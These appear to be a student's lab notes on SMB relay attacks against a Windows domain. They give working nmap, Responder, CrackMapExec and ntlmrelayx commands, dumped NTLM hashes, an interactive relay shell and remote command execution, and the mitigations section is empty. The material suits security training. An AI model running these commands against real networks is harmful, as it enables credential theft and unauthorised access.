Search

SMB Relay Attacks (NTLM)

image

Instead of cracking, PASS/RELAY it to gain access!

By default:

SMB signing is disabled on user accounts

SMB signing is enabled on server accounts

Identify Hosts without SMB Signing:

nmap --script=smb2-security-mode.nse -p445 192.168.218.136 -Pn

-Pn checks host anyway

image

adjusting Responder:

sudo mousepad /etc/responder/Responder.conf

switch SMB and HTTP to Off

then run responder

Scanning Domain Controller:

image

Message signing enabled and REQUIRED. Can’t do it.

Scanning one of the computers:

image

Message signing enabled but NOT REQUIRED. What we want.

You can run it on everything and catch back the ones that are not by using grep:

nmap --script=smb2-security-mode.nse -p445 192.168.218.0/24 -Pn | grep not -A 2

DISCORD TIP: USE CME

cme smb 192.168.218.0/24 --gen-relay-list relay.list
image

Note: SPIDERMAN was offline that's why it wasn’t found!

relay.list can be used with ntlmrelayx

ntlmrelayx.py -tf relay.list -smb2support

-tf is target file. Could be relay.list or it could be targets.txt if we did it the nmap way!

image

Hashes dumped:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8018cdf5a02e39797ef1cd07b654939c:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

to use interactive mode:

ntlmrelayx.py -tf relay.list -smb2support -i

and listen to it with:

nc 127.0.0.1 11000

you can type help to find commands!

ntlmrelayx.py -tf relay.list -smb2support -c "whoami"
Mitigations